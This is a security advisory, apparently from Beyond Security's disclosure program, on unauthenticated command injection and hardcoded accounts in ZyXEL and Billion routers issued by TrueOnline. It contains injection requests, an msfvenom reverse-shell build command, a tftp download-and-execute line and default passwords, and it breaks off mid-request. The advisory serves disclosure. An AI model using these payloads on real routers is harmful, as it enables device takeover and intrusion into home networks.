{"id":6273,"date":"2017-01-23T14:07:53","date_gmt":"2017-01-23T22:07:53","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-124\/"},"modified":"2017-01-23T14:07:53","modified_gmt":"2017-01-23T22:07:53","slug":"news-124","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-124\/","title":{"rendered":"SSD Advisory &#8211; ZyXEL \/ Billion Multiple Vulnerabilities"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes four (4) vulnerabilities and default accounts \/ passwords in ZyXEL \/ Billion customized routers.<\/p>\n<p>TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge.<\/p>\n<p>The routers are manufactured by ZyXEL and Billion runs a special Linux distribution called &#8220;tclinux&#8221;. Several models are distributed by TrueOnline, three in particular are widespread:<\/p>\n<ol>\n<li>ZyXEL P660HN-T v1 (distributed up to 2013)<\/li>\n<li>ZyXEL P660HN-T v2<\/li>\n<li>Billion 5200W-T (currently being distributed to new clients)<\/li>\n<\/ol>\n<p>These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run BOA web server. The routers are vulnerable via command injections in its web interface, which can be exploited by an unauthenticated as well as an authenticated attacker. Furthermore, the routers includes several hardcoded accounts besides the usual administrator account.<\/p>\n<p>The four vulnerabilities found in ZyXEL \/ Billion routers:<\/p>\n<ol>\n<li>Unauthenticated remote command execution vulnerability &#8211; P660HN-T v1 router<\/li>\n<li>Unauthenticated remote command execution vulnerability &#8211; Billion 5200W-T<\/li>\n<li>Authenticated remote command execution vulnerability &#8211; Billion 5200W-T<\/li>\n<li>Unauthenticated remote command execution vulnerability &#8211; P660HN-T v2<\/li>\n<\/ol>\n<p>Default accounts and passwords:<\/p>\n<ol>\n<li>Default accounts- P660HN-T v1 router<\/li>\n<li>Default accounts &#8211; P660HN-T v2<\/li>\n<li>Default accounts \u2013 Billion 5200W-T router<\/li>\n<\/ol>\n<p><strong>Credit<\/strong><br \/> Pedro Ribeiro (pedrib@gmail.com) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><span id=\"more-2910\"><\/span><\/p>\n<p><strong>Unauthenticated remote command execution vulnerability &#8211; P660HN-T v1 router<\/strong><br \/> The P660HN-T v1 router has a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log<br \/> Remote host: <em>;command;#<\/em><\/p>\n<p>The vulnerability is can be found in the <em>ViewLog.asp<\/em> page, which is accessible unauthenticated.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825251915423035\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/ViewLog.asp HTTP\/1.1  remote_submit_Flag=1&amp;remote_syslog_Flag=1&amp;RemoteSyslogSupported=1&amp;LogFlag=0&amp;remote_host=%3bping+-c+3+10.0.99.102%3b%23&amp;remoteSubmit=Save<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>The command injection is in <em>remote_host<\/em> parameter:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82525a124680870\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> remote_host=%3bping+-c+3+10.0.99.102%3b%23<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82525a124680870-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82525a124680870-1\"><span class=\"crayon-v\">remote_host<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3bping<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">10.0.99.102<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3b<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><u>Proof of Concept<\/u><br \/> To preform the attack, the following MSF command line should be used:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82525d700137108\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> msfvenom -p linux\/mipsbe\/shell_reverse_tcp -f elf -o \/tmp\/shell-be.bin lhost=192.168.1.35 lport=4444<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82525d700137108-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82525d700137108-1\"><span class=\"crayon-v\">msfvenom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mipsbe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell_reverse_tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">elf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bin <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4444<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>Which will serve the <em>\/tmp<\/em> directory through the <em>tftp<\/em> service.<\/p>\n<p>This should be followed by downloading and executing a shell by injecting the following command:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825260835939099\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> cd tmp; tftp -g -r shell.bin 10.13.37.1; chmod +x \/tmp\/shell.bin; \/tmp\/shell.bin<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825260835939099-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825260835939099-1\"><span class=\"crayon-e\">cd <\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tftp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">g<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bin<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.13.37.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bin<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Default accounts- P660HN-T v1 router<\/strong><\/p>\n<ol>\n<li>username: admin; password: password<\/li>\n<li>username: true; password: true<\/li>\n<\/ol>\n<p><strong>Unauthenticated remote command execution vulnerability &#8211; Billion 5200W-T <\/strong><br \/> There&#8217;s an unauthenticated command injection in the <em>adv_remotelog.asp<\/em> file:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825262130847715\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/adv_remotelog.asp HTTP\/1.1  Host: 192.168.1.1  Content-Type: application\/x-www-form-urlencoded  Content-Length: 85    RemotelogEnable=1&amp;syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&amp;serverPort=514<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825262130847715-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825262130847715-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825262130847715-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825262130847715-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825262130847715-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825262130847715-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825262130847715-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">adv_remotelog<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">asp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825262130847715-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825262130847715-3\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825262130847715-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">85<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825262130847715-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825262130847715-6\"><span class=\"crayon-v\">RemotelogEnable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">syslogServerAddr<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3bping<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">192.168.1.35<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3b<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">serverPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">514<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>The injection is in the <em>syslogServerAddr<\/em> parameter that can be exploited by entering a valid IP address, followed by <em>&#8220;;&lt;COMMAND&gt;;&#8221;<\/em><\/p>\n<p><u>Proof of Concept<\/u><br \/> Same as the previously mentioned unauthenticated remote command execution vulnerability &#8211; P660HN-T v1, the only difference is the target device.<\/p>\n<p><strong>Authenticated command execution vulnerability &#8211; Billion 5200W-T<\/strong><br \/> The Billion 5200W-T has a authenticated command injections in its interface <em>tools_time.asp<\/em>  with the <em>uiViewSNTPServer<\/em> parameter:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825265629131071\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/tools_time.asp HTTP\/1.1  Host: 127.0.0.1:10080  Authorization: Basic YWRtaW46cGFzc3dvcmQ=  Cookie: SESSIONID=7c082c75  Content-Length: &#8230;    SaveTime=1&amp;uiCurrentTime2=&amp;uiCurrentTime1=&amp;ToolsTimeSetFlag=0&amp;uiRadioValue=0&amp;uiClearPCSyncFlag=0&amp;uiwPCdateMonth=0  &amp;uiwPCdateDay=&amp;uiwPCdateYear=&amp;uiwPCdateHour=&amp;uiwPCdateMinute=&amp;uiwPCdateSec=&amp;uiCurTime=N%2FA+%28NTP+server+is+connecting%29  &amp;uiTimezoneType=0&amp;uiViewSyncWith=0&amp;uiPCdateMonth=1&amp;uiPCdateDay=&amp;uiPCdateYear=&amp;uiPCdateHour=&amp;uiPCdateMinute=  &amp;uiPCdateSec=&amp;uiViewdateToolsTZ=GMT%2B07%3A00&amp;uiViewdateDS=Disable&amp;uiViewSNTPServer=&#8221;%3b+ping+-c+20+127.0.0.1+%26%23  &amp;ntp2ServerFlag=N%2FA&amp;ntp3ServerFlag=N%2FA<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tools_time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">asp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-3\"><span class=\"crayon-v\">Authorization<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Basic <\/span><span class=\"crayon-v\">YWRtaW46cGFzc3dvcmQ<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-4\"><span 